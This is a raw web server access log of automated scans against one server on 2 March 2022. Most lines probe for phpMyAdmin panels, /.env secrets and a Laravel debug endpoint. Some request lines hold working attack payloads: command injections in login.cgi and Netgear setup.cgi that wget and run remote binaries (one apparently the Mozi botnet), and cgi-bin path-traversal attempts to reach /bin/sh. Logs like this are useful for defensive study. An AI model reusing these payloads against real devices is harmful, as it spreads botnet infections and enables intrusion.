73.28.99.7 - - [02/Mar/2022:04:07:54 +0100] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:54 +0100] "GET /pma2013/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:54 +0100] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:54 +0100] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:55 +0100] "GET /db/webadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:55 +0100] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:55 +0100] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:57 +0100] "GET /phpmyadmin/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:57 +0100] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:58 +0100] "GET /sql/sqlweb/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:58 +0100] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:58 +0100] "GET /sql/sql/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:59 +0100] "GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:04:07:59 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:59 +0100] "GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:07:59 +0100] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:00 +0100] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:00 +0100] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:00 +0100] "GET /pma2015/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:01 +0100] "GET /pma2017/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:01 +0100] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:01 +0100] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:01 +0100] "GET /mysql/pma/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:02 +0100] "GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:02 +0100] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:02 +0100] "GET /admin/db/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:03 +0100] "GET /phpMyAdmin_/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:03 +0100] "GET /PMA2014/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:03 +0100] "GET /PMA2021/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
138.68.4.4 - - [02/Mar/2022:04:08:03 +0100] "GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:04 +0100] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:04 +0100] "GET /phpmyadmin2013/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:04 +0100] "GET /PMA2019/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:04 +0100] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:05 +0100] "GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:05 +0100] "GET /phpMyAdmin-5.1.1-english/index.php?lang=en HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:05 +0100] "GET /pma2012/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:06 +0100] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:06 +0100] "GET /sqlmanager/index.php?lang=en HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:06 +0100] "GET /pma2018/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:07 +0100] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:07 +0100] "GET /PMA2021/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:07 +0100] "GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:08 +0100] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:08 +0100] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:08 +0100] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:08 +0100] "GET /admin/index.php?lang=en HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:09 +0100] "GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:09 +0100] "GET /phpmy/index.php?lang=en HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
73.28.99.7 - - [02/Mar/2022:04:08:09 +0100] "GET /PMA2016/index.php?lang=en HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
138.68.4.4 - - [02/Mar/2022:04:08:17 +0100] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
206.226.64.150 - - [02/Mar/2022:04:08:39 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
206.226.64.150 - - [02/Mar/2022:04:08:40 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:04:08:59 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.137.23.152 - - [02/Mar/2022:04:10:29 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
45.146.165.37 - - [02/Mar/2022:04:12:06 +0100] "GET /_ignition/execute-solution HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.137.21.141 - - [02/Mar/2022:04:14:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
88.83.53.164 - - [02/Mar/2022:04:14:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://195.133.40.56/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "DEMONS/2.0"
3.90.235.208 - - [02/Mar/2022:04:15:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/50.0.3070.62 Safari/537.32"
45.137.23.152 - - [02/Mar/2022:04:17:37 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
45.137.23.152 - - [02/Mar/2022:04:22:05 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
45.146.165.37 - - [02/Mar/2022:04:22:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.137.21.141 - - [02/Mar/2022:04:23:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.118.53.210 - - [02/Mar/2022:04:24:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
43.131.33.139 - - [02/Mar/2022:04:27:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
31.43.98.149 - - [02/Mar/2022:04:28:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
94.232.45.12 - - [02/Mar/2022:04:29:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
94.232.45.12 - - [02/Mar/2022:04:31:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
45.146.165.37 - - [02/Mar/2022:04:31:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:04:32:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:04:33:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
94.232.45.12 - - [02/Mar/2022:04:33:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
45.146.165.37 - - [02/Mar/2022:04:36:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
35.195.93.98 - - [02/Mar/2022:04:36:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
35.195.93.98 - - [02/Mar/2022:04:37:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.27.1"
45.146.165.37 - - [02/Mar/2022:04:37:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:04:38:30 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
183.136.226.3 - - [02/Mar/2022:04:40:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
94.232.45.12 - - [02/Mar/2022:04:40:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
94.232.45.12 - - [02/Mar/2022:04:42:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
202.171.161.24 - - [02/Mar/2022:04:43:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
94.232.45.12 - - [02/Mar/2022:04:48:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
31.220.3.140 - - [02/Mar/2022:04:48:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:04:48:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:04:49:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.146.165.37 - - [02/Mar/2022:04:49:24 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:04:49:50 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
31.220.3.140 - - [02/Mar/2022:04:49:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:04:50:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:04:50:53 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:04:51:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.146.165.37 - - [02/Mar/2022:04:51:23 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
31.220.3.140 - - [02/Mar/2022:04:51:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
94.232.45.12 - - [02/Mar/2022:04:52:04 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
31.220.3.140 - - [02/Mar/2022:04:52:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:04:52:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
94.232.45.12 - - [02/Mar/2022:04:52:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
45.146.165.37 - - [02/Mar/2022:04:54:08 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:04:54:19 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
59.95.72.239 - - [02/Mar/2022:04:56:07 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.95.72.239:46508/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
115.194.140.138 - - [02/Mar/2022:04:57:46 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
94.232.45.12 - - [02/Mar/2022:04:58:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
94.232.45.12 - - [02/Mar/2022:04:59:38 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
66.63.177.190 - - [02/Mar/2022:05:00:22 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
66.63.177.190 - - [02/Mar/2022:05:01:17 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
66.63.177.190 - - [02/Mar/2022:05:01:27 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
66.63.177.190 - - [02/Mar/2022:05:01:53 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
66.63.177.190 - - [02/Mar/2022:05:02:22 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
66.63.177.190 - - [02/Mar/2022:05:03:17 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
66.63.177.190 - - [02/Mar/2022:05:03:50 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
45.137.21.141 - - [02/Mar/2022:05:03:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
5.239.151.228 - - [02/Mar/2022:05:04:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
5.239.151.228 - - [02/Mar/2022:05:04:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
132.145.9.189 - - [02/Mar/2022:05:05:24 +0100] "GET /.env HTTP/1.1" 404 309 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
132.145.9.189 - - [02/Mar/2022:05:05:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.137.21.141 - - [02/Mar/2022:05:07:10 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.118.53.194 - - [02/Mar/2022:05:07:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
37.120.142.22 - - [02/Mar/2022:05:08:11 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.120.142.22 - - [02/Mar/2022:05:08:11 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
